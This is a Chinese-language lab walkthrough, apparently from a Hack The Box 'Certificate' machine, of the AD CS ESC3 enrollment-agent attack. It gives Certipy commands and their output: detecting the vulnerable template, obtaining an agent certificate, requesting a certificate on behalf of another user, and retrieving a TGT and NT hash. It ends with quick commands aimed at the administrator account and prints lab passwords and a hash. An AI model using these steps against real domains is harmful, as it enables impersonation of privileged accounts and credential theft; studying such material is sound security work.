2.ECS3

利用案例 【week3】Certificate > 3.3. ECS3

1. 介绍

ESC3 漏洞利用了与证书请求代理(也称为注册代理)相关的弱点。

注册代理(Enrollment Agent)是一个被授权代表其他用户请求证书的账户。这种功能在某些场景下是合法的,例如帮助台人员为用户注册智能卡,或者用于自动化证书配置系统。

然而,如果攻击者获得了活动的注册代理证书,或者他们能利用配置错误的模板权限来注册一个新的注册代理证书,他们就可以滥用此权限来为其他用户获取证书,包括像域管理员(Domain Administrators)这样的高权限账户

2. 利用

06 ‐ Privilege Escalation · ly4k/Certipy Wiki · GitHub
利用工具:certipy

2.1. 检测

certipy-ad find -u 'user@domain' -p 'Pass' -dc-ip 'ip' -vulnerable -stdout

#例子,检测出模版 Delegated-CRA 存在ECS3漏洞
┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad find -u 'Lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.10.11.71' -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\Administrator
        Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.

2.2. 提权

假设检测出模版 Delegated-CRA 存在ECS3漏洞

2.2.1. 第一步:获取注册代理证书

攻击者(attacker@corp.local)会从一个配置错误的 EnrollAgent 模板(或者是一个具有 ESC2 "Any Purpose" 漏洞的模板)来申请证书。

  • 这里的错误模版就是存在ECS3漏洞的 Delegated-CRA 模版
┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad req -u 'Lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.10.11.71' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'

执行后会输出一个 .pfx 文件

2.2.2. 第二步:使用注册代理证书代表目标用户请求证书

使用 attacker.pfx(在第一步中获得的注册代理证书)来代表 CORP\Administrator 用户,从 User 模板(或另一个合适的、代理可注册的目标模板)请求证书。

┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad req -u 'Lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.10.11.71' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'certificate\ryan.k'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 26
[*] Successfully requested certificate
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'

2.2.3. 第三步:使用证书进行认证获取Hash

┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# ntpdate 10.10.11.71
2025-06-24 15:47:39.722106 (-0400) +27460.073931 +/- 0.036741 10.10.11.71 s1 no-leap
CLOCK: time stepped by 27460.073931
                                                                                                                                                                                              
┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71' 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'ryan.k@certificate.htb'
[*]     Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

2.3. 快速利用命令

certipy-ad req -u 'user' -p 'pass' -dc-ip 'ip' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'ECS3漏洞模版'

certipy-ad req -u 'user' -p 'pass' -dc-ip 'ip' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'User' -pfx 'lion.sk.pfx' -on-behalf-of 'certificate\administrator'

ntpdate 10.10.11.71
certipy-ad auth -pfx 'administrator.pfx' -dc-ip 'ip'